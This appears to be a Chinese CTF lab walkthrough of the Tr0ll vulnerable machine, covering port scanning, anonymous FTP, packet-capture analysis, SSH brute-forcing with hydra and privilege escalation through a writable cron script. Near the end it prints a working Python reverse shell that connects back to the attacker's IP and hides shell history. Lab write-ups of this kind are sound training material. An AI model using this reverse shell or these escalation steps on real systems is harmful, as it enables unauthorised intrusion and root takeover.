Tr0ll靶场复现
w9n3d
- 关注
Tr0ll靶场复现
一、环境搭建
Kali攻击机IP地址:192.168.247.145
靶机IP地址:暂时未知
二、信息收集
1、Nmap获取靶机地址
靶机地址为192.168.247.147
2、Nmap进行端口探测
靶机开放了21、22、80端口,且允许默认账号Anonymous/Anonymous登录
3、目录扫描
发现robots.txt中存在secret目录
尝试访问web页面
未发现可利用的信息
4、指纹识别
三、漏洞探测
尝试登陆ftp
分析该流量包
全局搜索字符串是否存在txt文件,发现secret_stuff.txt
不断点击find,发现secret_stuff.txt文件的ftp data
该文件提示找到了sup3rs3cr3tdirlol
一开始还以为是哪个用户的密码,经过尝试发现是一个目录
下载该文件并分析
strings查找该文件的可打印字符串,提示找到地址0x0856BF
经过尝试发现也是一个目录
打开第一个文件夹
存在一堆字符,感觉是用户名
打开第二个文件夹
发现Pass.txt,难不成这个就是密码?!
将第一个文件做成用户名字典,第二个文件做成密码,尝试爆破ssh
emmm...失败了,通过查阅资料发现,是将文件名当作密码
通过参数-p指定密码为Pass.txt,获得ssh的账号密码为overflow/Pass.txt
四、权限提升
登陆ssh
查看系统信息
搜索本地提权漏洞
将文件复制到当前桌面目录
利用python启用http简易服务传输文件
查看flag文件
五、拓展与总结
登陆ssh后发现几分钟后shell就会断开,应该是配置了计划任务,查看计划任务
*/2 * * * * cleaner.py
*/2:分钟字段,表示每分钟都执行一次。* 表示每分钟,/2 表示每个值(在这里是分钟)都执行一次。
*:小时字段,表示每小时都执行一次。* 表示每个小时。
*:日期字段,表示每天都执行一次。* 表示每个日期。
*:月份字段,表示每个月都执行一次。* 表示每个月。
*:星期字段,表示每周都执行一次。* 表示每个星期。
总结为分、时、日、月、周
脚本的作用是删除/tmp目录下的所有文件并退出程序
查看该文件的权限信息
1、反弹shell(此处靶机修改了一下环境,ip变为192.168.247.148)
#!/usr/bin/python
def con():
import socket, time,pty, os
host='192.168.247.145'
port=9999
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()
2、新增root可执行程序
执行程序
3、为overflow用户添加sudo权限
此次打靶涉及的知识点有常规的信息收集(端口、目录、指纹)、ftp匿名登录、流量分析、文件分析、hydra爆破以及多种提权方式等。
本文为 w9n3d 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
HNCTF-osint
2024-05-18
第一届 "帕鲁杯" - CTF挑战赛-Misc-350×350
2024-04-24
2024 第一届VCTF纳新赛-Misc-f0rensicmaster
2024-03-25
文章目录